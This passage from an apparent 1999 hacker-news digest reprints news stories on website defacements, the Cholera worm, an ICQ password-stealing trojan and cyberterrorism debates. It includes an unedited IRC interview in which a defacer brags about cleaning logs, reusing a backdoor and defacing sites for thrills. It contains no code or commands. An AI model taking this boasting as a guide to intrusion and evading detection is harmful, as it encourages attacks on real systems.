Georgia Power were having a slow morning, according to utility spokeswoman Carol Boatright. "We're simply monitoring everything, and everything is going well," she said. Richardson said he has directed the Energy Department to conduct an additional 20 reviews of randomly selected electric utilities over the next two months. "It is critically important that by October or November that we be 100 percent compliant," he said. "We can't just wait until three days before millennium starts to be compliant." Meanwhile, some Americans seemed unconcerned - or even unaware - of the high powered tests and fearful computer watching. "I hadn't heard about 9-9-99," said James Lawrie, 29, a jewelry vendor in downtown Phoenix. "I hope it doesn't affect my checking account." Phoenix police Sgt. Michael Sheahan said Thursday's date didn't concern him at all. "Four nines?," he asked. "That's a good poker hand in 5-card stud." @HWA 24.0 US Chinese Embassy Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by McIntyre A group calling itself the 'Level Seven Crew' defaced the web page of US Chinese Embassy on Tuesday. CNN http://cnn.com/TECH/computing/9909/07/embassy.hack/index.html CNN- Second Story http://cnn.com/TECH/computing/9909/08/hack.folo/index.html OSALL - Interview with Vent from Level Seven Crew http://www.aviary-mag.com/News/Vent_Speaks/vent_speaks.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html CNN #1; Hackers put racist, anti-government slogans on embassy site September 7, 1999 Web posted at: 1:07 p.m. EDT (1707 GMT) (CNN) -- Hackers hit a Web site for the U.S. embassy in China Tuesday, replacing its home page with racist and anti-government statements. A group named Level Seven Crew claimed responsibility on the page for the prank, making references to bombing China and a "war of skill" with hackers started by the FBI. The State Department was not available for immediate comment, and Level Seven did not respond to e-mail. The Attrition.org Web site, which monitors and mirrors hacked sites, shows that Level Seven has hacked more than two dozen Web sites this year, including those belonging to the NASA Goddard Space Flight Center, Atlanta Braves, Linux headquarters, Sheraton Hotels, Beyond Software and Santa's Official Page. -=- Embassy site hackers aimed to show its vulnerability In this story: Group linked to Pentagon hacker Racist comments a 'mistake' (CNN) -- Hackers who hit a Web site for the U.S. Embassy in China are part of an 13-member group that has claimed responsibility for altering more than two dozen Web sites this year and chooses targets to show up their security flaws. The group, called Level Seven Crew, claimed responsibility Tuesday for replacing the Embassy page so it displayed racist comments and made references to bombing China and a "war of skill" started by the FBI. The State Department failed to return a request for comment. The site was restored by Wednesday. "We were bored, so we decided to deface it and prove a point that the site was insecure," said 'vent,' a Level Seven member who responded to a message sent to an e-mail address on the hacked site. "We patched it up and after we were all through, we defaced it," vent said. "We didn't harm the box though because we aren't a malicious group." The Level Seven Crew's Web site claims the group has hacked sites put up by the NASA Goddard Space Flight Center, Atlanta Braves, Linux headquarters, Sheraton Hotels, Beyond Software and Santa's Official Page. Group linked to Pentagon hacker Level Seven started several years ago and lost five members due to recent FBI raids of the group Global Hell, some of whose members also worked with Level Seven, vent wrote. The Justice Department announced last month that Chad Davis, 19, a founder of Global Hell, was arrested and charged in a federal complaint with hacking into the U.S. Army computer and "maliciously" interfering with the communications system. The complaint said he gained illegal access to an Army Web page and modified the contents. Davis, of Green Bay, Wisconsin, also was accused of gaining access to an unclassified Army network and removing and modifying its computer files to prevent detection. Davis's arrest is part of a nationwide investigation of Global Hell that has been under way for several months and has turned up more than a dozen other suspects, according to the Chicago Sun-Times. Although investigators suggest that more arrests may be coming, Davis' apprehension shows the difficulty of tracking down computer criminals -- even those, like Davis, who are relatively brazen, according to federal law enforcement officials and computer security experts. Racist comments a 'mistake' As for Level Seven, just one of dozens of loose-knit groups of hackers worldwide, some of its members work as security consultants, vent wrote. This seems to be typical of hackers -- many work in the information technology industry. Racist comments posted on the hacked embassy site were a "mistake," vent wrote. Some members of Level Seven are Chinese and the words were meant as an internal joke that inadvertently was posted for the hack. The FBI actively searches for hackers, arriving at their homes with search warrants and sometimes carting away their computers -- activities Level Seven calls on some of its hacked pages a "war." But Level 7's members are "good hackers," vent wrote, because "Level Seven secures the box without touching the files on it." The group knows that hacking is wrong, vent wrote, but will continue to do so to illustrate security lapses. "We will succeed. We will thrive," vent wrote. The Associated Press contributed to this report. -=- OSALL Interview; Vent, Head of L7 Speaks 9/8/99 Mike Hudack Editor-in-Chief In accordance with OSAll´s interview policy the following interview is offered verbatim and unedited in any way. With that in mind, however, I´ve decided to add a small amount of commentary to the beginning of this interview: Defacements take place daily -- and the major ones reach the mainstream media. The media, by giving attention to these defacers (usually script kiddies) is helping to encourage this action. The media, on the other hand, does have an obligation to report the news -- and the defacement of a site such as the United States Chinese Embassy is news. In the following interview Vent, the head of L7, tells us that he feels he´s addicted to defacing. In addition he admits -- for the first time -- that he´s a script kiddie. Session Start: Wed Sep 08 20:05:51 1999 [20:05] cnn interviewed us on the us embassy hack, and msnbc might later tonight. [20:06] sweet [20:06] mirrored at attrition, i presume? [20:07] yea, did it last night at 2:30am, www.usembassy-china.gov [20:07] and www.fgdc.gov [20:07] for the attention, right? [20:08] nah, to get raided. [20:08] heh [20:08] heh.. i was stoned [20:08] and bored, and needed some fun [20:08] heh [20:08] smart [20:09] make a big story bout us now on aviary-mag ;c] [20:09] heh [20:09] if im gunna get raided might as well get media attention before i do [20:09] ;c\ [20:09] yeah [20:09] hey, you didn't give me a shout-out! [20:09] :-) [20:09] i cleaned logs and shit up, they prolly cant trace it back to me [20:09] i went through a shell and shit [20:10] make a big story bout us now on aviary-mag ;c] [20:10] rofl [20:10] i tell you what... let me print this conversation :-) [20:10] hah [20:10] ok ;c] [20:10] good [20:11] so what vuls did you use? [20:11] well if ur logging the convo.. "HI MOM!" [20:11] yeah :-) [20:11] what exploits? [20:11] we logged in wif netcat. [20:11] heh [20:12] heh... can anyone say "script kiddies?" [20:12] yea yea, im a script kiddie, but a experianced one, me and my buddies are drinking atm... to celebrate some shit ;c] [20:12] heh [20:12] "script kiddie" is just a nickname [20:12] i'm saying heh too much... and i didn't prepare for this, so i don't have structured questions for ya :-) [20:13] did you use the same methods on both servers? [20:13] ppl call me "greaser" .. cause i got madd phat hair [20:13] [20:13] but that dont mean anything, i know alot, and thats all that counts. [20:13] ^ [20:13] answer the question, kiddie [20:13] no, the fgdc.gov had a backdoor flake placed .. before he got raided [20:14] we havent seen flake in like 2 months. [20:14] you waited all this time to deface it? [20:14] yea.. [20:14] why? so you could have two big defacements for the media? [20:14] shows how the admin actually looks on the box. [20:15] come on... are you actually doing this for the admins -- or for the attention? [20:15] no, i was looking at my little list .. and did eny meeany miny moe [20:15] heh, i dont do alot of shit fort the attention [20:15] cnn mailed me first, and shit [20:15] yeah [20:15] who interviewed you from cnn? [20:15] i dont care bout media, but if they want it.. i gib it [20:16] Robin Lloyd i think [20:16] gonna keep defacing sites? [20:16] yea, why not. ill deface, so will foil and everyone else in the group [20:16] why? if all you really want to do is show that the admins are idiots... why not e-mail their bosses with examples of the problems? [20:17] heh, ive answered this like 5 times today.. because, its fun, to embarras them.. [20:17] i'm sure you have ;-) [20:17] hacking is a sport sorta, a hobby.. an addiction if you will. [20:17] you really consider it an addiction? [20:17] yes, im at my computer almost all the time. [20:18] but i sometimes go to bars and drink [20:18] so are a lot of people -- who don't deface websites [20:18] then come home and hack while piss drunk [20:18] for me its different, i get a "high" and adrenalyne rush from defacing and hacking [20:18] what about sports? :-))) [20:18] so does other l7 members, like skillet, bass, and motivez [20:19] think they're addicted? [20:19] hacking is a sport, in the way: you deface, fbi gotta try to get you [20:19] like a football game [20:19] heh [20:19] all the L7 members are computer addicts.. otherwize we wouldnt be together several years. [20:19] what'll happen to you if bugtraq and the rest get shut down? :-) [20:20] some members script thier own sploits, ive been to bugtraq like 4 times this year. [20:21] yeah [20:21] anyway, i've gotta run... i have an interview with the cryptonym guy in five minutes [20:21] anything else you'd like to add before I get going? [20:21] yea .. " Level Seven will not die, we will suceed, we will thrive " [20:21] thought id add that [20:21] now, back to toking up [20:21] ;c] [20:22] --EOF [20:22] ;c] [20:22] well, thanks man [20:22] i'll have this published tomorrow... [20:22] and with a little commentary ;-) [20:22] of? [20:23] just a little about how defacement isn't the solution [20:23] i hope you don't mind @HWA 25.0 Scottish Executive Site Defaced - After Warning ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by info According to the BBC the Scottish Governments Website has been defaced. The site was down for maintenance yesterday evening and is the latest in a series of embarrassing security flaws in the site. The Saga of the site started over 1 month ago when the Conference DNS 'outed' the site for poor security. Secondary DNS Con http://www.dnscon.org BBC http://news.bbc.co.uk/hi/english/uk/scotland/newsid_441000/441675.stm Screen shot of cracked page - provided by Attrition.org http://www.attrition.org/mirror/attrition/1999/09/08/www.scotland.gov.uk/www.scotland.gov.uk.gif HNN Archive for September 7, 1999 - Security Tightened on Scottish Executive Site http://www.hackernews.com/arch.html?090799#6 HNN Archive for August 17, 1999 - DNS Con Claims Lax Security of Government Site http://www.hackernews.com/arch.html?081799 Secondary DNS Con - Original Press Release http://www.hackernews.com/press/dnscon.html BBC; UK: Scotland Hackers hit ministers' Website again The Scottish Executive Website was found to be insecure Computer hackers have again breached security surrounding the Scottish Executive's Website. The intrusion comes less than a week after it emerged that security measures had been tightened following a warning that the site was open to attack by hackers. The opening page, containing a foreword from First Minister Donald Dewar, was accessed on Wednesday morning and bogus text inserted. Throughout the afternoon, the site was unavailable and the message "currently being updated" was posted on the home page. A Scottish Executive spokesman said urgent talks were taking place with the site designers to find out the measures put in place since the original warning had been breached. He stressed that the site did not contain sensitive information. Campaign group Security was tightened after a warning it was open to attack from hackers, terrorists and other criminals. The administration's site was targeted by a group campaigning for greater precautions against information warfare. The group said the security lapses meant hackers could have gained access and theoretically declared Scottish independence. DNScon is a computer security conference which claims hackers, police officers and lawyers are among its members. The group said the biggest loophole in the Scottish Executive's site lay open for months and remained open for several days after First Minister Donald Dewar was alerted to the problem. 'False information' DNScon said hackers could have planted false information on the website, such as the results of a reshuffle of the Scottish cabinet, declaring independence, or manipulating the stock market by falsely changing taxes on North Sea oil or whisky. The Scottish Executive said there was "a potential security problem" which was discovered two weeks ago and the company which manages the site was informed. A spokeswoman said a number of countermeasures were immediately taken. Members of DNScon are normally publicity shy but one representative, known only as 'Mark', said the Scottish Executive's website failed to keep up to date with the latest security measures. He said: "The Scottish Executive site was over a year out of date when it comes to these software patches and fixes. "So the problems were known about in the computer industry for over a year and solved for over a year but they just had not got round, through their policies and procedures, to applying them. 'Simple addition' "The giveaway was that by typing a simple addition to a web page address you could read code that you as a normal user of the website should not have been able to see." The campaigners said the UK was not taking the dangers so-called of Infowar attacks seriously enough. The group likened hacking processes to the Cold War and, in painting a doomsday scenario said InfoWar could mean anything from missile attacks on enemy radar and telecom centres, to the creation of computer viruses. Disinformation and spin doctoring have also been seen as constituting InfoWar. The end aim of all these activities, the group said, is to win publicity in the same way that terrorist bombs do. @HWA 26.0 Cholera Outbreak Expected ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by AlienPlague A new Worm/Virus threat, named Cholera, may soon begin spreading throughout the net but it hasn't yet been found in the wild. Cholera is similar to Worm.ExploreZip in that will automatically send itself to any e-mail address it finds. The worm includes a payload of the W32/CTX virus. Infoworld http://www.infoworld.com/cgi-bin/displayStory.pl?99098.encholera.htm Warnings go out about Cholera worm/virus threat By Matthew Nelson InfoWorld Electric Posted at 1:47 PM PT, Sep 8, 1999 A new combined worm and virus threat, called Cholera, has been posted to a hacker's Web site and has anti-virus vendors scrambling to provide protection before an epidemic spreads akin to Melissa and Worm.ExploreZip. Computer Associates has found Cholera posted to a hacker site in Germany, and due to the potential danger inherent in the worm/virus, is warning users not to accept suspicious e-mail attachments. The worm/virus is currently listed as a medium threat, as it has not been found "in the wild" and infecting user systems, but will automatically be upgraded to a high threat as soon as it is, according to the company. "We're calling it a moderate alert. But once it gets in the wild we will call it a high alert, because of its ability to spread," said Narender Mangalam, product manager for anti-virus at Computer Associates. Cholera is similar to Worm.ExploreZip as it unleashes a worm-style attack that will automatically send itself to any e-mail address it finds on an e-mail system, and therefore carries the potential to clog and shut down e-mail servers. Cholera is also not platform-dependent, and can operate off of any e-mail system, according to Mangalam. Cholera also includes a virus aspect, as it will drop a virus file, W32/CTX, when it infects a new machine. At this time, Computer Associates is still investigating what payload, if any, the virus will deliver. "We're not sure what virus does as of now," said Mangalam. Currently Cholera will send itself to a recipient with a "smiley" face in the text and an attachment named Setup.exe that looks like a self-extracting setup program. The icon of this attachment looks like a standard Windows install program, but the color is off. The worm goes resident when the infected system is rebooted. Once activated, the worm installs itself by adding keys to WIN.INI on Win9x and registry on WinNT. The worm will also try to copy itself to any shared drives to which the user is currently connected. Then it proceeds to infect executables in the directory from where it is launched with a virus named W32/CTX. When users open the attachment it displays a message that reads, "Cannot open file: it does not appear to be a valid archive. If you downloaded this file, try downloading the file again." Invisible to the user, the worm will turn into an auto-start application by writing a RUN entry to the Win.ini file (Windows 9x) or to the registry (Windows NT). After sending itself out the worm deletes itself from the system, CA officials said. Although no reports of users being infected have been received by anti-virus vendors, the potential for infection and the possibility that other virus writers will copy and alter the core capabilities of Cholera for "copy-cat" viruses, has companies on alert. "It's sort of a duel thing because of the virus and worm aspect, so it's sort of screaming, 'Build a variant of me,' " said Mangalam. Computer Associates intends to provide an update to its anti-virus systems and recommends users contact whatever anti-virus vendors they utilize. Computer Associates International, in Islandia, NY., is at www.cai.com. Matthew Nelson is an InfoWorld senior writer. @HWA 27.0 Web Email Vulnerable? ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by frost_frozen Are computer users putting corporate data at risk? In light of the recent HotMail hole some companies have started to block free email services from their corporate networks. Some have gone so far to as to prevent email forwarding and web access to such sites as Hotmail, Yahoo Mail, or Excite Mail. CNN http://cnn.com/TECH/computing/9909/08/email.risk.idg/index.html Hotmail hack shows risks of Web e-mail September 8, 1999 Web posted at: 12:54 p.m. EDT (1654 GMT) by Carolyn Duffy Marsan From... (IDG) -- E-mail administrators are clamping down on users who send and forward messages to free Web-based e-mail services, such as Microsoft's Hotmail or Yahoo Mail. The new policies are designed to prevent exposure to e-mail security breaches, such as last week's hack of Hotmail, one of the worst on record. Some administrators are blocking end users from forwarding messages to Web-based e-mail services, while others are filtering e-mail messages headed to those sites. Companies that don't have policies about Web-based e-mail still expect users to know better than to put corporate data at risk. Attorneys at Greenebaum, Doll and McDonald, a Louisville, Ky., firm, are allowed to forward e-mail to Web-based accounts. "But I hope they're not doing that," says Mandi Turner, who manages the firm's network services. "If they forwarded something inappropriate, it could be malpractice." Turner recently installed TenFour's TFS Secure Messaging-Server software for e-mail virus checking and encryption. She plans to begin using the software's e-mail content filtering soon. "We'll be looking for Hotmail addresses," she says. At the other end of the spectrum is Westinghouse's Anniston, Ala., plant, which blocks all messages to Hotmail, America Online and other Internet e-mail services. "We just started filtering out the Internet e-mail sites about two months ago," says LAN manager Steve Sanders. He uses Elron Software's CommandView Internet Manager to search outgoing e-mail for key words such as "free mail" and "MSN," and then blocks those destinations. The security risks of Web-based e-mail came to the forefront last week when a design flaw in Hotmail was exploited by hackers. The hackers set up Web sites that allowed anyone to open a Hotmail user's account without a password, read or delete that person's messages or send messages under that person's name. Hotmail users were exposed to the security breach for hours before Microsoft shut down and fixed the service. The most popular free Web-based e-mail service, Hotmail has more than 40 million e-mail accounts. Hotmail has become the preferred alternative e-mail address for corporate America. Whether it's for job hunting, sending off-color jokes, distributing the football pool or chatting with family members, Hotmail is where executives send and receive the e-mail messages they don't want seen at work. What makes Hotmail so popular is that messages can be easily accessed over the Internet from the office, home or on the road. "Hotmail is used by all of the executives who have grown tired of roaming software and firewalls. When they're travelling, they just forward everything to a Hotmail account so they can go to an Internet cafe or a friend's computer and access their e-mail," says Eric Arnum, a consultant with e-mail outsourcer United Messaging. "E-mail administrators need to recognize that as a giant gaping hole in their security." Hotmail also has some legitimate uses in the enterprise: backup and testing corporate e-mail systems and serving as a spam repository, for example. "I use my Hotmail account for spam. I redirect it to that account," says Dale Seavey, senior manager of the Global Strategic Application Technology Group at Cisco. "We use Hotmail to test our Internet connections," says David Byrkit, e-mail administrator for ITT Avionics in Clifton, N.J. "Almost all of us in the IT area keep Hotmail accounts in case we're called upon to see if the connectivity is working." The challenge for e-mail administrators is setting up policies that allow benign uses of Web-based e-mail services while protecting companies from exposure through these nonsecure sites. Entertainment giant 20th Century Fox has reached a compromise by allowing traffic to Web-based e-mail services but monitoring that traffic with content-filtering software. "We see a tremendous amount of traffic going across the network to Hotmail, AOL and Yahoo," says Jeff Uslan, manager of information protection at the film studio. He uses Elron Software's CommandView Internet Manager to search outgoing and incoming e-mail for words that might indicate proprietary or inappropriate content. "We don't want information sent out about our latest movie or our latest star being signed," Uslan says. "We have to protect our intellectual property." Meanwhile, ITT Avionics keeps all its sensitive e-mail on a classified network that has no connection to the Internet. All other e-mail can be sent out over the Internet without restriction, Byrkit says. "We haven't been terribly concerned about any security issues with respect to using Hotmail or any other ISP-based mail system," Byrkit says. "We have a lot of mail that has to go to the Internet. We have to be very careful about restricting that in any way." Others, however, are just saying no. "We get an occasional request from our users to forward e-mail to Hotmail," says Dale Cybela, a senior consultant with eFunds, a Milwaukee-based provider of electronic payment services. "We tell them, 'Sorry, we already provide facilities for people to get e-mail while on the road.'" @HWA 28.0 Cyber Terrorism - US Biggest Threat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid Rep. Curt Weldon, R-Pa., of the House Armed Services Committee, while speaking at InfoWar Con, placed "cyberterrorism" at the top of his list of modern threats to the American way of life. He placed this threat above missile proliferation and weapons of mass destruction. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2330904,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Info war or electronic saber rattling? By Kevin Poulsen, ZDNN September 8, 1999 6:01 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2330904,00.html WASHINGTON, D.C. -- The threat of attacks on civilian and government computer networks by rogue nations and terrorist groups is growing as the United States becomes increasingly wired, defense officials and a U.S. Congressman said Wednesday. Speaking at the InfowarCon conference to a crowd of uniformed military personal, corporate IT managers, computer security consultants and at least one screenwriter, Rep. Curt Weldon, R-Pa., of the House Armed Services Committee placed "cyberterrorism" at the top of his list of modern threats to the American way of life. "In my opinion, neither missile proliferation nor weapons of mass destruction are as serious as the threat you are here to discuss," Weldon said. Weldon warned that civilian infrastructure, including air traffic control systems, communications networks and computer controlled subways could all be vulnerable from cyberspace. "If I want to wreak havoc on a society that, in some cases, has become complacent, I am going to attack your quality of life," Weldon said. By way of example, Weldon said he was privy to a computer intrusion three years ago at a New York hospital, in which the perpetrator "was able to change all the patients' blood types." When asked by ZDNN whether the intruder had been apprehended and prosecuted, Weldon said he wasn't certain. He declined to identify the hospital. Key to war fighting "It's clear that information superiority is the key to 21st Century war fighting," said Major General John Campbell, who heads the Defense Department's Joint Task Force on Computer Network Defense (JTF). The JTF was launched last year after a series of attacks by a group of three teen-age hackers on Defense Department Internet systems alarmed Pentagon officials who feared they may be facing a genuine cyberwar as they prepared for operations in Iraq. The intrusions, Campbell said, underscored the need for a central computer security authority within the DOD. "Somebody has to be in charge," said Campbell. Campbell said that although the Pentagon's classified network is isolated, its unclassified network, NIPRNET, is connected to the Internet through official and unofficial gateways, and is increasingly relied upon in military operations. "We've had 400 percent growth in traffic since 1996," said Campbell. "NIPRNET has become the network of choice for war fighters." The JTF maintains a 24-hour operations center intended to serve as an early warning system for attacks on Pentagon systems. But it's rogue nations, not teen-age hackers, that the center is watching for. "If they're defacing a Web page, there's not much of an effect on our ability to support troops," said Campbell. "Of course, we take the most serious view until we can prove it's a hacker" -- a process that generally involves asking the FBI to track and arrest the culprit. Electronic Pearl Harbor? Not everyone is convinced that America is facing an electronic Pearl Harbor, though. "There's very little evidence that information warfare poses any direct threat, as do, for example, bombs and guns and tanks," said Marc Rotenberg, director of the Electronic Privacy Information Center. "Proposals to combat it invariably lead to greater authority and funding for military agencies and a reduction of freedom and privacy for individuals." Rotenberg said computer security problems should be addressed, "but it shouldn't be done in such a way as to expand military authority or to reduce the openness of research." @HWA 29.0 Philippine Gov Scared of Cyber Terrorists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond The Philippine government is looking to beef up its online security of government systems. This adverticle also boasts Network Associates as some Internet savior. Interesting quote: "90 percent of computer systems in the world are attacked and as much as 70 percent of these attacks result in financial losses, with the average loss in the US at US$84,000". Where do they get these numbers? Computer Currents http://www.currents.net/newstoday/99/09/08/news12.html Daily News Govt Addresses Cyber Terrorist Threats By Joel D Pinaroc, Metropolitan Computer Times. September 08, 1999 The Philippine government is taking cyber terrorism seriously and is talking with global security "solutions" vendors about possible network security projects for its information technology (IT) initiatives. This was affirmed in a recent consultative meeting between the National Security Council (NSC), the lead agency tasked to address Internet-borne threats and other issues on national security, and software vendor Network Associates, Inc. [NASDAQ:NETA]. Cyber terrorism is the act of computer systems intrusion with malicious and often destructive intent. Dean Mansfield, NAI vice president for Asia Pacific, said in an interview, that the Philippine government has expressed "high interest" in some of the company's latest security "solutions." He declined, however, to give further details. "We talked about NAI's latest security solutions and the possibility of using these solutions for government IT projects. The meeting generated high interest from government officials, notably Gen. Alexander Aguirre who chairs the NSC," Mansfield said. Mansfield said the Philippine government could follow the example set by the United States government in beefing up security in government agencies that may be prone to malevolent intrusions of so-called computer "hackers." According to reports, hacking is considered the most common form of cyber terrorism. How pervasive is computer hacking? Mansfield said recent studies conducted by United States' Federal Bureau of Investigation (FBI) showed that as much as 90 percent of computer systems in the world are attacked by hackers and as much as 70 percent of these attacks result in financial losses. In the US, average "financial damage" per company is pegged at US$84,000, Mansfield said. The cases of intrusions are not limited to the US, he added, as most countries that are using IT in their respective governments are also prone to "cyber terrorists." In the Philippines, recent reports stated that two government Web sites were "hacked," although damages was very "minimal." These were the Web sites of the Bangko Sentral ng Pilipinas (http://www.bsp.gov.ph ) and the Department of Energy (http://www.doe.gov.ph ). Further, Mansfield said hacking is "quite easy" and that popular software applications such as Windows NT, which uses a 40-bit encryption system, can be hacked in as short a time as three hours, while systems with a 56-bit encryption can be hacked in three days. "Of course, ordinary users may not be able to do so, but there are a number of very good computer users out there who can easily hack their way into your computer systems," Mansfield said. The answer, Mansfield said, is the 128-bit encryption standard that is "virtually" impossible to hack. He added that the US government is so confident with this system that bills for Congress are now being "delivered" over the public network using a 128-bit encryption system. Although the 128-bit encryption standard may be the panacea to prevent cyber terrorism, most countries, including the Philippines, may have to wait a little longer before they can acquire the technology due to the apparent reluctance of the US government to make the technology available to more countries. "It is a matter of policy before 128-bit encryption technology becomes available to more countries outside of the US," Mansfield said. @HWA 30.0 US Sen. Warns of Cyber Attack Along with Y2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by TurTlex U.S. Sen. Robert Bennett, the head of the U.S. Senate Special Committee on the Year 2000 Technology Problem, has issued a warning that industrial spies and others may use the Y2K issue to cause mayhem. This article is unclear if the Senator was talking about Y2K coders who may insert bad code along with the fixes or people who will take advantage of existing holes and confusion to masquerade their attacks. Computer World http://www.computerworld.com/home/news.nsf/all/9909083y2kcon (Online News, 09/08/99 05:23 PM) Senators warn of Y2K hack potential By Patrick Thibodeau WASHINGTON -- The head of the U.S. Senate Special Committee on the Year 2000 Technology Problem warned today that hackers, people engaged in industrial espionage and even other countries may seize the year 2000 problem as their best shot to attack corporate and government information systems (see story). "Those who wish us ill will for one reason or another," said U.S. Sen. Robert Bennett, will use Y2K "as an opportunity to attack." Bennett and committee Vice Chairman Sen. Christopher Dodd also said that while the U.S. is in overall good shape to handle Y2K, they expect some failures domestically and more problems overseas. But they warned that if people hoard prescription drugs and food or begin pulling money out of banks, the Y2K problem could lead to larger problems. "The greatest fear that I have is that you are going to get panic setting in ... from those who predict dire consequences," Dodd said. Bennett and Dodd said the U.S. is in better shape than the rest of the world but will likely see some system failures. "We have accomplished far more than I would have predicted," said Bennett. But he cautioned that his assessment is largely based on self-reporting by corporations and may be too rosey. "It's impossible to get a second opinion," he said. Problems could occur in key U.S. cities. Only two of the 21 major U.S. cities, Boston and Dallas, were Y2K ready in a recent assessment by the U.S. General Accounting Office. The two cities the Senate committee is most worried about are San Francisco and Baltimore, said Bennett. Internationally, Y2K progress in Russia, Japan and Italy are of key concern, said Dodd, although he said Latin America's Y2K effort has improved dramatically in the past several months. But Dodd said negotiations with Russia over establishing a joint cooperation center to guard against accidental nuclear missile launches "are back on track" after being sidelined by the Kosovo crisis. Dodd said there could be a signed agreement in the next week or two. @HWA 31.0 JPEG Steals ICQ Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by mobys_dick_ A Trojan Horse masquerading as a .jpeg file has been circulating around the net for some time. It has effected at least 200 of AOL's 40 million customers. Details of the attack are scarce but the file somehow steals ICQ passwords. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2331403,00.html Wired http://www.wired.com/news/news/technology/story/21663.html C | Net http://news.cnet.com/news/0-1005-200-114889.html?tag=st.ne.1002.bgif.1005-200-114889 PC World http://www.pcworld.com/pcwtoday/article/0,1510,12721,00.html ZDNet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Trojan horse infects AOL's ICQ By Margaret Kane, ZDNN September 9, 1999 1:09 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331403,00.html A Trojan Horse masquerading as a JPEG file is allowing hackers to gain access to ICQ passwords, America Online Inc. officials confirmed today. Officials at AOL (NYSE:AOL), which owns the ICQ instant messaging service, had only sketchy details on the hack. A spokeswoman said the company had begun receiving incident reports today, but said the company did not know how long the file may have been circulating. Limited penetration Only around 200 incidents have been reported, the spokeswoman said, out of the estimated 40 million subscribers. She said that when consumers open the file a "hacker is able to gain access to ICQ passwords," but did not have any more information on how exactly the program worked. She did say that the company had developed a way to restore a consumers ICQ number to them. -=- Wired; ICQ Users Get Disconnected by Chris Oakes 2:30 p.m. 9.Sep.99.PDT Imagine picking up your phone to find your line dead and your phone number in someone else's hands. The cyberspace equivalent happened to users of the ICQ instant messaging system this week. Approximately 200 ICQ users reported their passwords stolen and their accounts taken over by unknown users. "This is sort of like losing your own phone number that you've had for years and years," said Steve Gossett, an ICQ user in Temple City, California. "Not only do they have the ability to represent you, but they've stolen that part of your Internet -- that part of your 'phone.'" Gossett uses the system for both personal communications and some business contacts worldwide. When his account was stolen, he said he had to notify over a hundred other ICQ contacts by email, telling them to ignore any messages sent under his ICQ number, as he no longer controlled it. Gossett has resorted to using a secondary ICQ number. "I've had three years of ICQ contacts -- some of them business contacts spread out across the US and a couple foreign countries." America Online subsidiary Mirabilis maintains the ICQ network. More than 60,000 new users sign up daily for ICQ, which totals 42 million worldwide users. Members use the system to check if friends and colleagues are online, and send each other "instant" text messages. AOL spokesperson Regina Lewis said the company has been aware of the problem for as long as a month and has a mechanism in place so users can get their number back. She said the number of reported incidents is less than 200. Users' passwords were obtained by way of simple email trickery, Lewis said. Over the last month, ICQ users have received an email message containing an attached file disguised as a JPEG. When users opened the attached file, instead of opening a JPEG image, the attachment loaded a small malicious program. The program emailed the user's ICQ password back to the sender. The perpetrators have not been identified or stopped. In any case, Lewis said users can retrieve their ICQ account numbers by sending email to support@icq.com. If users indicate they've had their number stolen, ICQ will return it within 24 hours after the user is verified, she said. "The system was not compromised in any way. Somebody didn't go in and break into the database of ICQ," Lewis emphasized. She also reminded users not to open suspicious JPEG email attachments. Lewis agreed that an ICQ account can be as important as a telephone line. "That's why it's so important that they can get it fixed -- because people love their ICQ." Gossett said numerous attempts to log into his ICQ account Wednesday afternoon resulted in repeated "invalid password" rejection messages. When he visited his ICQ personal page on the Web, where users enter personal profile information about themselves, he discovered that his information was gone. In its place was just the name "honix," possibly that of a cracker. He logged into his secondary ICQ account and found that someone else was logged on under his primary account. He then made a fruitless attempt to notify AOL tech support representatives. Miami-based user Ricardo Arenas reported his password stolen in early August. "A week later my ICQ number had disappeared from their database. It doesn't even exist anymore. I had to get a new one. It's a little annoying." When he sent email to an ICQ feedback address, Arenas said he received only an automated email reply. In the intervening month, he received no information on the problem. Neither Gossett nor Arenas recalls receiving the attachment as described by AOL. The ICQ support message boards have lit up with complaints of the same problem. Users claim that when AOL was no help solving the problem, they gave up hope of getting their ICQ accounts back and opened new ones. Lewis said users like Arenas and Gossett simply weren't following the correct path to support. "I don't know how they tried to get through, but the right way is support@icq.com." The ICQ instant messaging system has experienced several security problems in the past. In August of last year, a security problem let ICQ members log into the network using other users' accounts. Using the bug, an imposter could potentially talk his way into gaining sensitive information. Earlier that year, security experts criticized ICQ for lacking secure barriers against hijacking, spoofs, and other hostile programs that could listen in on personal and potentially sensitive communications sent over the system. Since then ICQ said it had worked to improve security. -=- C|Net; Trojan horse steals ICQ users' identities By Paul Festa Staff Writer, CNET News.com September 9, 1999, 4:20 p.m. PT Hundreds of ICQ users have found themselves temporarily duped out of their online identities, as a new Trojan horse is making its way around the Net. ICQ members are identified by numbers. With more than 42 million registrations, newer numbers have become quite lengthy, making the shorter numerical IDs of early ICQ adopters hot properties. Now those shorter name tags are the targets of theft, as malicious hackers are distributing a Trojan horse that steals passwords and commandeers control of ICQ accounts. A Trojan horse is a piece of computer code that behaves in an unexpected, usually nefarious manner. In this case, the Trojan is disguised as a JPEG image file, distributed by email, that steals the ICQ password from the user's hard drive. AOL, which bought ICQ last year, said it had anticipated the theft of low-numbered ICQ accounts and had provided a way of verifying the authenticity of the accounts' original owners and restoring control to them. Users whose passwords have been stolen can be re-authenticated at ICQ.com. So far, about 200 ICQ users have reported having their passwords stolen in recent weeks, AOL said. The Trojan was first reported by Wired News. -=- PCWorld; From PC World 